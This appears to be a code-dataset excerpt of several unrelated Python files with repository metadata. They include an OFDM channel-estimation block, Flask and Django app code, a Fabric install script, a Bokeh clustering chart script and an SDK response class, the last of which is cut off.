        self.est_data_freq = np.zeros((self.max_num_corr, self.num_data_bins), dtype=complex)

        self.rx_data_time = np.zeros((1, self.M[0] * self.nfft), dtype=complex)  # first dimension = no of antennas
        self.synchdat00 = np.zeros((1, self.M[0] * self.num_synch_bins), dtype=complex)

        # Scratch state filled in during work(); kept on self for inspection.
        self.del_mat = []
        self.eq_gain = []
        self.eq_gain_ext = []
        self.eq_gain_q = []

        self.SNR = SNR
        self.count = 0
        self.diagnostics = diagnostics
        self.directory_name = directory_name
        self.file_name_cest = file_name_cest

        gr.sync_block.__init__(self,
                               name="SynchAndChanEst",
                               in_sig=[np.complex64],
                               out_sig=[np.complex64])

    def work(self, input_items, output_items):
        """Scan the input for synch peaks, then equalise the data symbols.

        NOTE(review): performs heavy per-call numpy work and prints to
        stdout -- looks intended for offline/diagnostic use rather than
        real-time throughput.
        """
        in0 = input_items[0]
        out = output_items[0]

        # Slide a candidate window through the buffer in steps of stride_val.
        n_trials = int(np.around(len(in0) / self.stride_val))
        for P in list(range(n_trials)):
            if self.M[0] * self.rx_b_len + P * self.stride_val + self.nfft + self.start_samp < len(in0):
                # Gather one FFT's worth of samples for each synch symbol.
                for LL in list(range(self.M[0])):
                    aaa = self.rx_b_len * LL + P * self.stride_val + self.start_samp
                    bbb = self.rx_b_len * LL + P * self.stride_val + self.start_samp + self.nfft
                    self.rx_data_time[0][LL * self.nfft:(LL + 1) * self.nfft] = in0[aaa:bbb]

                # FFT each candidate symbol and extract the synch bins.
                tmp_1vec = np.zeros((self.M[0], self.nfft), dtype=complex)
                for LL in list(range(self.M[0])):
                    tmp_1vec[LL][:] = np.fft.fft(self.rx_data_time[0][LL * self.nfft:(LL + 1) * self.nfft], self.nfft)
                    self.synchdat00[0][LL * self.num_synch_bins:(LL + 1) * self.num_synch_bins] = tmp_1vec[LL][self.synch_bins_used_P]
                synchdat0 = np.reshape(self.synchdat00, (1, self.num_synch_bins * self.M[0]))

                # Normalise to unit average power before correlating.
                p_est = np.sqrt(len(synchdat0[0]) / sum(np.multiply(synchdat0[0][:], np.conj(synchdat0[0][:]))))
                synchdat = [p_est * kk for kk in synchdat0]

                # Correlate against the Zadoff-Chu reference under every
                # timing-offset hypothesis; the row with the largest
                # magnitude gives the fractional timing index.
                tmp_2mat = np.matmul(self.del_mat_exp, np.diag(synchdat[0]))
                self.del_mat = np.matmul(tmp_2mat, np.conj(self.zadoff_chu))
                dmax_ind = np.argmax((abs(self.del_mat)))
                dmax_val = np.max((abs(self.del_mat)))

                # Accept the peak only above a 0.4 normalised-correlation
                # threshold, and only if it is at least one full symbol
                # past the previous detection (or is the first one).
                if dmax_val > 0.4 * len(synchdat[0]):
                    tim_synch_ind = self.time_synch_ref[max(self.cor_obs, 0)][0]
                    if ((P * self.stride_val + self.start_samp - tim_synch_ind > 2 * self.cp_len + self.nfft)
                            or self.cor_obs == -1):
                        self.cor_obs += 1
                        # Record sample offset, timing index and peak value.
                        self.time_synch_ref[self.cor_obs][0] = P * self.stride_val + self.start_samp
                        self.time_synch_ref[self.cor_obs][1] = dmax_ind
                        self.time_synch_ref[self.cor_obs][2] = int(dmax_val)

                        # Undo the timing phase ramp, then form an
                        # MMSE-style channel estimate at the synch bins
                        # (1/SNR regularisation in the denominator).
                        del_vec = self.del_mat_exp[dmax_ind][:]
                        data_recov = np.matmul(np.diag(del_vec), synchdat[0])
                        zcwn = [(1.0 / self.SNR) + qq for qq in np.ones(len(self.zadoff_chu))]
                        tmp_v1 = np.divide(np.matmul(np.diag(data_recov), np.conj(self.zadoff_chu)), zcwn)
                        chan_est00 = np.reshape(tmp_v1, (self.M[0], self.L_synch))
                        chan_est = np.sum(chan_est00, axis=0) / float(self.M[0])

                        # Scatter the per-bin estimate into a full-FFT
                        # vector and keep its time-domain version too.
                        chan_est1 = np.zeros((1, self.nfft), dtype=np.complex)
                        chan_est1[0][self.synch_bins_used_P] = chan_est
                        self.est_chan_freq_P[self.cor_obs][:] = chan_est1[0][:]
                        chan_est_tim = np.fft.ifft(chan_est1, self.nfft)

                        # Optionally pickle the time-domain channel
                        # estimate for offline inspection.
                        if self.diagnostics == 1:
                            date_time = datetime.datetime.now().strftime('%Y_%m_%d_%Hh_%Mm')
                            f = open(str(self.directory_name) + str(date_time) + str(self.file_name_cest) + '.pckl', 'wb')
                            pickle.dump(chan_est_tim, f, protocol=2)
                            f.close()
                        self.est_chan_time[self.cor_obs][0:self.nfft] = chan_est_tim[0][0:self.nfft]

                        # MMSE equaliser gains at the synch bins, applied
                        # to the recovered synch symbol(s).
                        chan_mag = np.matmul(np.diag(chan_est), np.conj(chan_est))
                        eq_gain_0 = [1.0 / self.SNR + vv for vv in chan_mag]
                        self.eq_gain = np.divide(np.conj(chan_est), eq_gain_0)
                        self.eq_gain_ext = np.tile(self.eq_gain, self.M[0])
                        self.est_synch_freq[self.cor_obs][:] = np.matmul(np.diag(self.eq_gain_ext), data_recov)

        # Equalise the data symbol that follows each detected synch block.
        for P in list(range(self.cor_obs+1)):
            if self.time_synch_ref[P][0] + self.M[0] * self.rx_b_len + self.nfft - 1 <= len(in0):
                data_ptr = int(self.time_synch_ref[P][0] + self.M[0]*self.rx_b_len)
                print("data pointer", data_ptr)
                data_buff_time = in0[data_ptr: data_ptr + self.nfft]
                t_vec = np.fft.fft(data_buff_time, self.nfft)
                freq_data_0 = t_vec[self.bins_used_P]
                # Normalise power, then undo the residual timing phase
                # ramp implied by the stored timing index.
                p_est0 = np.sqrt(len(freq_data_0)/(np.dot(freq_data_0, np.conj(freq_data_0))))
                data_recov_0 = freq_data_0 * p_est0
                arg_val = ([((1j * (2 * np.pi / self.nfft)) *
                    self.time_synch_ref[P][1]) * kk for kk in self.bins_used_P])
                data_recov_z = np.matmul(np.diag(data_recov_0), np.exp(arg_val))
                # MMSE equalisation using the channel estimate at the data bins.
                chan_est_dat = self.est_chan_freq_P[P][self.bins_used_P]
                chan_mag_z = np.matmul(np.diag(chan_est_dat), np.conj(chan_est_dat))
                eq_gain_z = [1.0 / self.SNR + vv for vv in chan_mag_z]
                self.eq_gain_q = np.divide(np.conj(chan_est_dat), eq_gain_z)
                self.est_data_freq[P][:] = np.matmul(np.diag(self.eq_gain_q), data_recov_z)

        # Rows of est_data_freq to emit this call.
        # NOTE(review): "/" is true division under Python 3, making
        # corr_size a float; the slice and reshape below would then need
        # int() -- confirm the intended Python version (project looks
        # Python 2 era).
        corr_size = self.num_ofdm_symb/sum(self.synch_dat)
        data_out = np.reshape(self.est_data_freq[0:corr_size][:], (1, corr_size * np.size(self.est_data_freq, 1)))
        # First call is skipped (warm-up); subsequent calls copy the
        # equalised bins into the output buffer.
        if self.count > 0:
            # NOTE(review): data_out has shape (1, K); indexing with
            # [:, np.newaxis] makes it 3-D before assignment into the 1-D
            # output slice -- confirm the intended broadcasting.
            out[0:np.size(data_out, 1)] = data_out[:, np.newaxis]
        self.count += 1
        self.cor_obs = 0
        return len(output_items[0])
| [
"noreply@github.com"
] | tayloreisman16.noreply@github.com |
0fb8c5cd4f2a1620ff306c658432e91e53d776d3 | 12dcb1cbea551159b1dee36e95b7950d532b2ccc | /app/views/word.py | 10b210a2d5b0f23f6ea940e9b30e2965a77522f5 | [] | no_license | guangyugeng/shanbay_word | 7cd6ac36e2adfee2ab2b85f175ed569f677dd155 | 6b5c984c3980f977035fcf292092593bc93a1469 | refs/heads/master | 2021-01-19T08:58:47.726767 | 2017-04-09T11:51:32 | 2017-04-09T11:51:32 | 87,701,516 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,657 | py | from app import app, db
from flask import render_template, flash, session, redirect, url_for
from flask_login import login_user, logout_user, current_user, login_required
from flask import g, Blueprint
from datetime import datetime
from app.models import Wordbook, Word, TodayWord, TodayWordbook, User, ROLE_USER, ROLE_ADMIN
from app.views.api import update_today_words
main = Blueprint('word', __name__)
@main.before_request
def before_request():
g.user = current_user
if g.user.is_authenticated:
g.user.last_seen = datetime.utcnow()
g.user.save()
@main.route('/word')
@login_required
def word():
user = g.user
return render_template('word/word.html',
user = user
)
@login_required
@main.route('/wordbook')
def wordbook():
user = g.user
learning_wordbook = user.learning_wordbook
my_wordbooks = Wordbook.query.filter_by(user_id=user.id).all()
return render_template('word/wordbook.html',
user = user,
learning_wordbook = learning_wordbook,
my_wordbooks = my_wordbooks
)
@main.route('/setting')
@login_required
def setting():
    """Render the settings page with the daily word-amount choices."""
    amount_choices = ['20', '50', '100', '150', '200', '250', '300',
                      '400', '500', '600', '700']
    current = g.user
    return render_template('word/setting.html',
                           title='Home',
                           user=current,
                           today_words_amount=str(current.today_words_amount),
                           learning_wordbook=current.learning_wordbook,
                           amounts=amount_choices)
@main.route('/new_word')
@login_required
def new_word():
    """List the not-yet-learned words of the current user's active wordbook."""
    current = g.user
    active_book = Wordbook.query.filter_by(
        book_name=current.learning_wordbook, user_id=current.id).first()
    unlearned = Word.query.filter_by(
        wordbook_id=active_book.id, learned=False).all()
    return render_template('word/new_word.html', words=unlearned)
@main.route('/today_word')
@login_required
def today_word():
    """Render today's study list, (re)building it first via the API helper."""
    # NOTE(review): the batch size 100 is hard-coded even though the user
    # model carries today_words_amount -- confirm whether that is intended.
    book_id = update_today_words(g.user, 100)
    words_for_today = TodayWord.query.filter_by(today_wordbook_id=book_id).all()
    return render_template('word/today_word.html', words=words_for_today)
@main.route('/learned_word')
@login_required
def learned_word():
    """List the already-learned words of the current user's active wordbook."""
    current = g.user
    active_book = Wordbook.query.filter_by(
        book_name=current.learning_wordbook, user_id=current.id).first()
    learned = Word.query.filter_by(
        wordbook_id=active_book.id, learned=True).all()
    return render_template('word/learned_word.html', words=learned)
| [
"guangyugeng@guangyugengdeMacBook-Pro.local"
] | guangyugeng@guangyugengdeMacBook-Pro.local |
8c878b62609cfce911163faa0392d39593781f71 | dd5f202f4c08c69a8ed5d6912fcd769fce3e598b | /example/async_sleeper.py | c64ceae030076813bbb7b3c5c8660c1c9ac66e1b | [
"MIT"
] | permissive | zhzLuke96/Yoi | d63cea1782cf77e91cb3b17cd6a8a6d527c559a0 | 8f5a0b6881c540aab71b8a360002b4d1e9de869a | refs/heads/master | 2020-03-28T09:18:23.572749 | 2018-10-27T16:43:07 | 2018-10-27T16:43:07 | 148,027,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,432 | py | import time
import asyncio
import datetime
import platform
from yoi.application import Application
from yoi.globals import g, request as cur_request
app = Application()
@app.router(r"^/sleep/(.+)/?$", methods=["GET"])
async def sleep(request, timer):
time.sleep(int(timer))
return f"server sleep {timer}s \n {datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S GMT')} \n{cur_request.args}\n{request.args}\n{hash(asyncio.Task.current_task(asyncio.get_event_loop()))}"
@app.router(r"^/aiosleep/(.+)/?$", methods=["GET"])
async def aiosleep(request, timer):
await asyncio.sleep(int(timer))
return f"server sleep {timer}s \n {datetime.datetime.now().strftime('%a, %d %b %Y %H:%M:%S GMT')} \n{cur_request.args}\n{request.args}\n{hash(asyncio.Task.current_task(asyncio.get_event_loop()))}"
@app.router(r"^/do/?$", methods=["GET"])
async def do():
return f"server do something"
@app.errorhandler("404")
def not_found():
return f"<h1>Not Found 404</h1><p>server on {platform.python_version()}</p>"
if __name__ == '__main__':
from yoi.server.aio_wsgiServer import WSGIServer
sev = WSGIServer(app, "127.0.0.1", 8000)
sev.run_forever()
# from wsgiref.simple_server import make_server
# # httpd = make_server("127.0.0.1", 8000, app)
# httpd = make_server("localhost", 8000, app)
# try:
# httpd.serve_forever()
# except:
# httpd.shutdown()
# raise
| [
"zhz961101@gmail.com"
] | zhz961101@gmail.com |
bf84a23ac25841aaf18ddc5f2a8785a878f6e123 | 3313419e883041b04bd09f7e905dc9fb24cd8ec8 | /multi_kmeans_group_line_chart.py | 7559a28604b94a194b5308ec440890374719a7d0 | [] | no_license | xiaosean/preprocess_py | d6d46a91be0d31c3ac082c4dc21587b27b34bf11 | fa480a0f8401c4ccff61ea8215bcf40802b2ba36 | refs/heads/master | 2023-06-23T17:30:19.296637 | 2017-11-06T23:12:02 | 2017-11-06T23:12:04 | 90,627,403 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,789 | py | import numpy as np
import pandas as pd
from time import time
from sklearn.cluster import KMeans
from pandas.computation import expressions as expr
from bokeh.charts import Line, show, output_file, save
import pprint as pp
import sys
from bokeh.palettes import Spectral11, Category10
# set configure
# path = "./CDR_NORMALIZE_CONCAT/"
path = "./CDR_FINAL/"
filename = "0703normalize_65_cols.csv"
# path = "./CDR_ANALYZE/"
# path = "./CDR_CONCAT/"
# filename = sys.argv[1]
# filename = "CDR_CONCAT_TABLE_4_max_min.csv"
# filename = "CDR_CONCAT_TABLE_4.csv"
relative_filename = path + filename #+ ".csv"
# out_filename = "mds_mly_minus20160901"
# after the numeric_st_idx's number will be tranform to int64
# numeric_st_idx = 1
# K = 8
label_path = "./kmean_label/"
output_path = "./CDR_CONCAT_ANALYZE_GRAPH/"
# output_path = "./CDR_CONCAT_ANALYZE_GRAPH_MINI/"
# read revise csv file and print cost time
# just load 5 data
t0 = time()
df_src = pd.read_csv(relative_filename, error_bad_lines=False)
print("time for read csv: %.2f" % (time()-t0))
# -------------------------
for c in df_src.columns[1:]:
if not "CNT" in c:
df_src = df_src.drop(c, 1)
# ----------------------------
# df = df.drop('MINING_DW_SUBSCR_NO', 1)
df_group = pd.read_csv('DNA_KMEANS_RESULT_ID_NEW.csv', error_bad_lines = False)
groups_name = ['1', '2', '3', '4', '5', '6', '7', '8', 'seldom', 'None']
# groups_name = ['1', '2', '3', '4', '5', '6', '7', '8']
# Ks = [8, 7, 6, 7, 5, 6, 6, 8, 7, 7]
Ks = [6, 4, 6, 7, 7, 6, 8, 7, 7, 7]
evening = "Evening user"
moring = "Morning user"
midnight = "Midnight user"
lunch = "Lunch time user"
All = "All day user"
dinner = "Dinner time user"
afternoon = "Afternoon user"
cluster_name = [
{107141:moring, 121153:midnight, 17176:lunch, 59992:afternoon, 32089:evening, 70046:dinner},
{25449:evening, 30950:dinner, 5441:lunch, 59944:midnight, 62860:All},
{20553:afternoon, 20809:dinner, 26798:moring, 32848:midnight, 4801:lunch},
{17959:evening, 24518:dinner, 33790:moring, 35510:midnight, 5181:lunch},
{17238:evening, 25183:dinner, 32834:moring, 31327:midnight, 3892:lunch},
{14298:midnight, 21404:"Late midnight user", 35439:moring, 35802:dinner, 39104:"Office time user"},
{19744:evening, 24966:afternoon, 33129:"Night user", 41770:moring, 44540:midnight},
{106596:dinner, 124046:moring, 146613:midnight, 21343:lunch, 91568:afternoon}
]
norm = "0704"
df_src['Groups'] = df_group['Groups']
for j in range(8):
K = Ks[j]
group = groups_name[j]
df = df_src[df_src['Groups'] == group]
label_path = "./kmean_label/"
# label_name = "label_K" + str(K) + "_de_with_kid_" + group + "_" + norm + ".npy"
label_name = "label_K" + str(K) + "__" + group + "_" + norm + ".npy"
labels_ = np.load(label_path + label_name)
# df.loc['label',list(map(str, df.index))] = labels_
df['label'] = labels_
grouped = df.groupby('label')
print(group)
df['label'] = labels_
grouped = df.drop(['MINING_DW_SUBSCR_NO', 'Groups'], 1).groupby('label')
# grouped = df.groupby('label')
# get count
group_count = grouped[df.columns[1]].count().values
# df = df.drop('MINING_DW_SUBSCR_NO', 1)
# get mean
group_mean = grouped.mean()
# cluster_name = {1012:'每通通話量長', 1470990:'幾乎不用', 23626:'高度使用', 283083:'有在使用', 48456:'夜貓族', 3601:'超高度使用', 68665:'中度使用', 697364:'稍微使用'}
# aggregate display data
data = {}
for i in range(K):
# data[str(i)] = grouped.mean().values[i]
# if "HOUR" in filename:
# # data[cluster_name[cluster_result[i]] + "(" + str(cluster_result[i]) + ")"] = list(map(lambda x: x/30,grouped.mean().values[i]))
# # data["(" + str(group_count[i]) + ")"] = list(map(lambda x: x/30, group_mean.values[i][1:]))
# else:
# # data[cluster_name[cluster_result[i]] + "(" + str(cluster_result[i]) + ")"] = list(map(lambda x: x/4,grouped.mean().values[i]))
# data["(" + str(group_count[i]) + ")"] = list(map(lambda x: x/4, group_mean.values[i][1:]))
# data[cluster_name[j][group_count[i]] + "(" + str(group_count[i]) + ")"] = group_mean.values[i]
data["(" + str(group_count[i]) + ")"] = group_mean.values[i]
# data[str(cluster_name[i])] = grouped.mean().values[i]
pp.pprint(df.columns[1:-2])
# select label
# xl = str(df.columns)
# xl = "MO_0_24 MT_0_24 MO_SUN_SAT_w_h MT_SUN_SAT_w_h"
xl = "hour"
# if filename.find("WORK") != -1:
# xl = str(df.columns[1:])
# elif filename.find("hours") == -1:
# xl = "SUN ~ SAT"
# yl = "time"
# if filename.find("TIME") == -1:
# yl = "count"
yl = "percentage"
# draw
# # set line colors
# mycolors = []
# # if K > 5:
# # mycolors = Spectral11[0:5] + Spectral11[6:K + 1]
# # else:
# # mycolors = Spectral11[0:K]
# for i in range(K):
# mycolors.append(Spectral11[i * 2])
title = "Group " + group
line = Line(data, ylabel = yl, xlabel = xl, color = Category10[10], title = title, legend = "top_center")
# line = Line(data, ylabel = 'mean ' + sys.argv[2], xlabel = xl)
# line.legend.orientation = 'horizontal'
legend = line.legend
legend.plot = None
legend.location = (0 , 300)
line.add_layout(legend[0], "right")
line.xaxis.axis_label_text_font_size = '20px'
line.yaxis.axis_label_text_font_size = '20px'
line.title.text_font_size = '30px'
# save file
# output_file("test_K" + str(i + 1) + ".html")
output_filename = ("%s_K%d_G%s_%s_line.html" % (filename[:-4], K, group, norm))
output_file(output_path + output_filename)
# output_file(output_path + filename[:-4] + "_K" + str(K) + "_NAME_distribution.html")
save(line)
# show(line)
# # save file
# # output_file("test_K" + str(i + 1) + ".html")
# line.title.text = title + " DETAIL"
# output_file(output_path + filename[:-4] + "_K" + str(K) + "_NAME_LARGE_distribution.html")
# save(line)
# # show(line) | [
"xiaosean5408@gmail.com"
] | xiaosean5408@gmail.com |
9ee8c45a0a1b6322c5d70c2a111aabf4840f4924 | 40a8d8c2c2bb98b6a27dd62825a601597e2970c5 | /home/management/commands/load_initial_data.py | 7fac54795d1eb102cf1db3da1f3040d1d30edc49 | [] | no_license | crowdbotics-users/elmedina3crowdboticsc-643 | 24dba124e00a7bef109cadebd9b5f07c4545c886 | 59274ebe30f52bab5455b4d853b4a75d6bd97c66 | refs/heads/master | 2020-04-16T04:51:54.804699 | 2019-01-11T17:36:08 | 2019-01-11T17:36:08 | 165,283,758 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py |
from django.core.management import BaseCommand
from home.models import CustomText, HomePage
def load_initial_data():
homepage_body = """
<h1 class="display-4 text-center">dj-app-160</h1>
<p class="lead">
This is the sample application created and deployed from the crowdbotics slack app. You can
view list of packages selected for this application below
</p>"""
customtext_title = 'dj-app-160'
CustomText.objects.create(title=customtext_title)
HomePage.objects.create(body=homepage_body)
class Command(BaseCommand):
can_import_settings = True
help = 'Load initial data to db'
def handle(self, *args, **options):
load_initial_data()
| [
"sp.gharti@gmail.com"
] | sp.gharti@gmail.com |
312637afdc22a6a403f21ab89f1a066ac79782ef | 64ddafc70e72f2dffebe9a76fccd62c710aabad1 | /fabfile.py | 37dc370fe2bbc4741273c9ed2129b54a470ac5e1 | [] | no_license | gkevlin/napalm_test | e2998791b9189e0ce6860d0b86ad47121702beb0 | 2e1a96cfbb86e147df2682847d810a9bc413f171 | refs/heads/master | 2021-01-17T05:58:15.056792 | 2017-04-28T05:54:23 | 2017-04-28T05:54:23 | 61,871,941 | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 442 | py | # Fabfile to:
# - update the remote system(s)
# - download and install an application
# Import Fabric's API module
from fabric.api import *
env.hosts = [
'localhost',
# 'ip.add.rr.ess
# 'server2.domain.tld',
]
env.user = "george"
def install_memcached():
    """Download and install memcached via apt on the remote host."""
    sudo("apt-get install -y memcached")
def update_install():
    """Install memcached; the system-update step is currently disabled."""
    # Update step intentionally skipped:
    # update_upgrade()
    # Install
    install_memcached()
| [
"g_kevlin@yahoo.com"
] | g_kevlin@yahoo.com |
cf1e966e07376d6b36bff43b29d054d6605dc0c0 | d590049d83ff2ae4a6682e75aba408146856931f | /topanalytics/migrations/0003_meta_topchretien.py | 7104d1603975a603c203dfa1f0019b58c322423d | [] | no_license | Drey77/topanalytics | f59653f93e16397774cd86f5e4a198e6dabea728 | b178b309ff9092cdd8effcd91b85e6312bb7648a | refs/heads/master | 2021-01-20T05:01:09.887206 | 2017-11-02T20:04:58 | 2017-11-02T20:04:58 | 101,409,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-14 09:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('topanalytics', '0002_auto_20170817_1010'),
]
operations = [
migrations.CreateModel(
name='Meta_TopChretien',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nickname', models.CharField(blank=True, max_length=25, unique=True)),
('topuser_id', models.CharField(blank=True, max_length=254, unique=True)),
('profile_picture', models.CharField(blank=True, max_length=254)),
('gender', models.CharField(blank=True, max_length=254)),
],
),
]
| [
"Zoldik77@hotmail.com"
] | Zoldik77@hotmail.com |
10a2193d745f0d20b165bd38fb86220c8fd0e02e | 977a791cc3dcd02a6df44d0bfefb24993cc9eb5e | /demo.py | a7dbbdcc4f3a42e7e4d1955520273f2582d030c4 | [] | no_license | swapnil8551/Python-pratice-Problem | a25978a3e8d4e7ab780d0697b0a1a90c3317840c | fd1c71bb44c0e0e86c66d29260f0ff4d0b6239e9 | refs/heads/main | 2023-02-17T20:00:20.398853 | 2021-01-10T14:12:15 | 2021-01-10T14:12:15 | 328,394,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | message='Hello'
msg='Swapnil'
demo=message + " " + msg + ' Dhoble!'
demo1= f'{message}, {msg} Dhoble!'
print(demo)
print(help(str.lower))
| [
"noreply@github.com"
] | swapnil8551.noreply@github.com |
17ad25d2e8dffa7fe47383880b68f953bfa4d2ee | 558a217cc362e5f00a8f89a202d3f0ca19a697cd | /generators/app/templates/app.py | b8dcce9fa94d482e23ff32014f936b9f5cf06bc4 | [
"MIT"
] | permissive | thinkulum/generator-python-cmd | 77059a14423acadabe86d20d5c20006db3301e9b | 769a5854a30ecfe39e14caabb41dd1133ba47b7f | refs/heads/master | 2023-01-14T07:50:28.023166 | 2020-04-21T01:56:49 | 2020-04-21T01:56:49 | 94,433,224 | 0 | 0 | MIT | 2023-01-06T01:32:17 | 2017-06-15T11:34:04 | Python | UTF-8 | Python | false | false | 2,238 | py | import sys
import os
import <%= packageName %>
def get_cmd_line():
    """Extract the app command line from sys.argv.

    :return: The command and any arguments that are to be sent to the app,
        joined into a single string, or ``None`` when nothing follows the
        script name.
    :rtype: str
    """
    # The script name may appear in argv as a bare filename or as a full
    # path, so match any entry that *ends with* it.  argv[0] can also be
    # '-c' (interpreter run with -c) or '' (no script given), so accept
    # those as the "script" position too.
    script_name = os.path.basename(__file__)
    for position, candidate in enumerate(sys.argv):
        if candidate.endswith(script_name) or candidate in ('-c', ''):
            trailing = sys.argv[position + 1:]
            # cmd parses the line itself, so hand it one joined string;
            # an empty tail means there is no command to run.
            return ' '.join(trailing) if trailing else None
    return None
def main():
    # Entry point for the generated CLI app.  `<%= packageName %>` is an EJS
    # placeholder substituted by the Yeoman generator, so this file is not
    # valid Python until the template is rendered.
    cli = <%= packageName %>.cli.CLI()
    # If arguments were passed on the command line, run them as one command;
    # otherwise drop into the interactive command loop (REPL).
    line = get_cmd_line()
    if line:
        return cli.onecmd(line)
    else:
        cli.cmdloop()
if __name__ == '__main__':
main()
| [
"thinkulum@gmail.com"
] | thinkulum@gmail.com |
62647d2ec8eadfac3792464d7cf95f9ea7218ebd | 0fb0901bc36d3cc433a2784c9bdc929836c1cf68 | /movies/apps.py | 5a9b320b8a9ad8882d7d03a85d819550b288b3ef | [] | no_license | JaysanJaychiev/Movies | b906699e2d036d5fb14b94e0105197ae0b8f7aa5 | a3daa290464e539c0513b5b26e257757269a2615 | refs/heads/main | 2023-09-02T19:59:46.988319 | 2021-11-18T15:26:03 | 2021-11-18T15:26:03 | 429,102,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from django.apps import AppConfig
class MoviesConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'movies'
verbose_name = "Фильмы"
| [
"jays.26@mail.ru"
] | jays.26@mail.ru |
2a7ff6d0903eefe973ced4d02def9ab3742f995c | 12a12dbaf416b7719810609988cd3f0d17b2d07a | /erp/migrations/0022_auto_20200113_1027.py | e618095e4db240f349a4b65bf0abc5c8495424f2 | [] | no_license | atulmala/classup2 | fca29f49481df1ad6393f14873fdc50a9557d271 | 62b7ad1164f7e548e6d599584eca7e6bfec311cc | refs/heads/master | 2022-09-20T15:33:59.119122 | 2020-06-01T11:20:14 | 2020-06-01T11:20:14 | 269,696,981 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('erp', '0021_collecttransportfee'),
]
operations = [
migrations.AlterField(
model_name='collecttransportfee',
name='bus_fee',
field=models.DecimalField(default=0.0, max_digits=8, decimal_places=2),
),
migrations.AlterField(
model_name='collecttransportfee',
name='slab',
field=models.CharField(default=b'X', max_length=2),
),
]
| [
"atul.gupta@classup.in"
] | atul.gupta@classup.in |
25140fd3f3e7a5763f3bfe8bf6267351ff1b11e0 | 47f391758b56668f4ad8c927b4250a4317098ade | /Lab1(5).py | beca4a0b821cd36b8eec8e3d3235d863051f79e7 | [] | no_license | panas-zinchenko/zinchenko_lab | 3a57cc6aa2d7e1082f3efac36cb1b87f0e44ba60 | 5d80cd81f5c0b066bbcf26e11d2d6a62c098674d | refs/heads/dev | 2022-08-24T15:02:05.997702 | 2020-05-17T18:13:01 | 2020-05-17T18:13:01 | 264,722,483 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | print("a)")
print(" * ")
print(" *** ")
print("*****")
print(" *** ")
print(" * ")
print("b)")
print("*****")
print("** **")
print("* * *")
print("** **")
print("*****")
print("c)")
print(" ******* ")
print(" * * ")
print("* Hello *")
print(" * * ")
print(" ******* ")
| [
"38880692+sprtzikps@gmail.com@users.noreply.github.com"
] | 38880692+sprtzikps@gmail.com@users.noreply.github.com |
dafa77b32a8dfcddfc2eb8d2354d543ee1d261d5 | d93edb43a92f6c5b861e749642694f38e77c4edb | /courseinfo/migrations/0003_auto_20210221_0735.py | cd4f3505b033d24f6081cd4f5907cca1a9074c7c | [] | no_license | tooba1712/imtiyaz_tooba_ezu | 61e32151e7c1b1c7cfbfc4f4a0160eb1e27e7fd9 | 26b8e3ce5a61c4579b837b3c94b6d02a96b67360 | refs/heads/main | 2023-04-16T07:03:31.142743 | 2021-04-28T21:35:36 | 2021-04-28T21:35:36 | 362,606,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,227 | py | # Generated by Django 3.1.6 on 2021-02-21 07:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courseinfo', '0002_auto_20210221_0623'),
]
operations = [
migrations.AlterModelOptions(
name='instructor',
options={'ordering': ['last_name', 'first_name', 'disambiguator']},
),
migrations.AlterModelOptions(
name='period',
options={'ordering': ['period_sequence']},
),
migrations.AlterModelOptions(
name='registration',
options={'ordering': ['section', 'student']},
),
migrations.AlterModelOptions(
name='section',
options={'ordering': ['course', 'section_name', 'semester']},
),
migrations.AlterModelOptions(
name='semester',
options={'ordering': ['year__year', 'period__period_sequence']},
),
migrations.AlterModelOptions(
name='student',
options={'ordering': ['last_name', 'first_name', 'disambiguator']},
),
migrations.AlterModelOptions(
name='year',
options={'ordering': ['year']},
),
migrations.AddConstraint(
model_name='instructor',
constraint=models.UniqueConstraint(fields=('last_name', 'first_name', 'disambiguator'), name='unique_instructor'),
),
migrations.AddConstraint(
model_name='registration',
constraint=models.UniqueConstraint(fields=('section', 'student'), name='unique_registration'),
),
migrations.AddConstraint(
model_name='section',
constraint=models.UniqueConstraint(fields=('semester', 'course', 'section_name'), name='unique_section'),
),
migrations.AddConstraint(
model_name='semester',
constraint=models.UniqueConstraint(fields=('year', 'period'), name='unique_semester'),
),
migrations.AddConstraint(
model_name='student',
constraint=models.UniqueConstraint(fields=('last_name', 'first_name', 'disambiguator'), name='unique_student'),
),
]
| [
"tooba2@illinois.edu"
] | tooba2@illinois.edu |
a47d8415c94513aab2c7019425699a484a4715b5 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-projectman/huaweicloudsdkprojectman/v4/model/list_child_issues_v4_response.py | 3c616232bd4fb42bfe7dfe5c4fc8ea0de1d33c81 | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,537 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ListChildIssuesV4Response(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'issues': 'list[IssueResponseV4]',
'total': 'int'
}
attribute_map = {
'issues': 'issues',
'total': 'total'
}
def __init__(self, issues=None, total=None):
